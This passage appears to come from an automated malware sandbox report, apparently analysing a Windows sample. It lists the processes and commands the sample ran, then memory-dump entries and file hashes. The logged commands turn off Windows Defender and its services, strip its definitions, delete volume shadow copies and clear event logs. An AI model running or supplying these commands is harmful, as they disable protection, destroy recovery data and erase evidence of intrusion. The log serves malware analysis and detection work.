reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl application
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
Files
memory/656-54-0x0000000000000000-mapping.dmp
memory/704-55-0x0000000000000000-mapping.dmp
memory/1640-56-0x0000000000000000-mapping.dmp
memory/1020-57-0x0000000000000000-mapping.dmp
memory/1148-58-0x0000000000000000-mapping.dmp
memory/1804-59-0x0000000000000000-mapping.dmp
memory/1952-60-0x0000000000000000-mapping.dmp
memory/308-61-0x0000000000000000-mapping.dmp
memory/824-62-0x0000000000000000-mapping.dmp
memory/1056-63-0x0000000000000000-mapping.dmp
memory/660-64-0x0000000000000000-mapping.dmp
memory/1172-65-0x0000000000000000-mapping.dmp
memory/1112-66-0x0000000000000000-mapping.dmp
memory/1664-67-0x0000000000000000-mapping.dmp
memory/992-68-0x0000000000000000-mapping.dmp
memory/988-69-0x0000000000000000-mapping.dmp
memory/1812-70-0x0000000000000000-mapping.dmp
memory/1712-71-0x0000000000000000-mapping.dmp
memory/1656-72-0x0000000000000000-mapping.dmp
memory/1624-73-0x0000000000000000-mapping.dmp
memory/1896-74-0x0000000000000000-mapping.dmp
memory/780-75-0x0000000000000000-mapping.dmp
memory/1632-76-0x0000000000000000-mapping.dmp
memory/2000-77-0x0000000000000000-mapping.dmp
memory/1604-78-0x0000000000000000-mapping.dmp
memory/328-79-0x0000000000000000-mapping.dmp
memory/704-80-0x0000000000000000-mapping.dmp
memory/1984-81-0x0000000000000000-mapping.dmp
memory/1064-82-0x0000000000000000-mapping.dmp
memory/972-83-0x0000000000000000-mapping.dmp
memory/1440-84-0x0000000000000000-mapping.dmp
memory/1100-85-0x0000000000000000-mapping.dmp
memory/1192-86-0x0000000000000000-mapping.dmp
memory/1664-87-0x0000000000000000-mapping.dmp
memory/1028-88-0x0000000000000000-mapping.dmp
memory/1704-89-0x0000000000000000-mapping.dmp
memory/1736-90-0x0000000000000000-mapping.dmp
memory/1748-91-0x0000000000000000-mapping.dmp
memory/1908-92-0x0000000000000000-mapping.dmp
memory/896-93-0x0000000000000000-mapping.dmp
memory/1864-94-0x0000000000000000-mapping.dmp
memory/1868-95-0x0000000000000000-mapping.dmp
memory/1212-96-0x0000000000000000-mapping.dmp
memory/1216-97-0x0000000000000000-mapping.dmp
memory/1180-98-0x0000000000000000-mapping.dmp
memory/1272-99-0x0000000000000000-mapping.dmp
memory/1520-100-0x0000000000000000-mapping.dmp
memory/1208-101-0x0000000000000000-mapping.dmp
memory/280-102-0x0000000000000000-mapping.dmp
memory/460-103-0x0000000000000000-mapping.dmp
memory/1964-104-0x0000000000000000-mapping.dmp
memory/900-105-0x0000000000000000-mapping.dmp
memory/2028-106-0x0000000000000000-mapping.dmp
memory/1988-107-0x0000000000000000-mapping.dmp
memory/912-108-0x0000000000000000-mapping.dmp
memory/1056-109-0x0000000000000000-mapping.dmp
memory/1108-110-0x0000000000000000-mapping.dmp
memory/1892-111-0x0000000000000000-mapping.dmp
memory/1904-112-0x0000000000000000-mapping.dmp
memory/756-113-0x0000000000000000-mapping.dmp
memory/1940-114-0x0000000000000000-mapping.dmp
memory/1516-115-0x0000000000000000-mapping.dmp
memory/600-116-0x0000000000000000-mapping.dmp
memory/1168-117-0x0000000000000000-mapping.dmp
memory/1340-118-0x0000000075AE1000-0x0000000075AE3000-memory.dmp
memory/1340-119-0x00000000023E0000-0x000000000302A000-memory.dmp
memory/1340-120-0x00000000023E0000-0x000000000302A000-memory.dmp
memory/1340-121-0x00000000023E0000-0x000000000302A000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 136df8aa392c6a628beedcf3fa5b77ef |
| SHA1 | b1358967b392b0066c22811f77833433e71da1ac |
| SHA256 | 2704d62928993cbc601f280dd74c224b8f89b96e52b5e6f57d97eaa642c3a16f |
| SHA512 | 44d017d9f003032f1f860fe055e628601a3e788ca8cfbf5b4176af5fe1f03387062f07c32d4cf5c935451f41ebb8c40fb21c0ea5f0aa3a0230db624d026ed8b9 |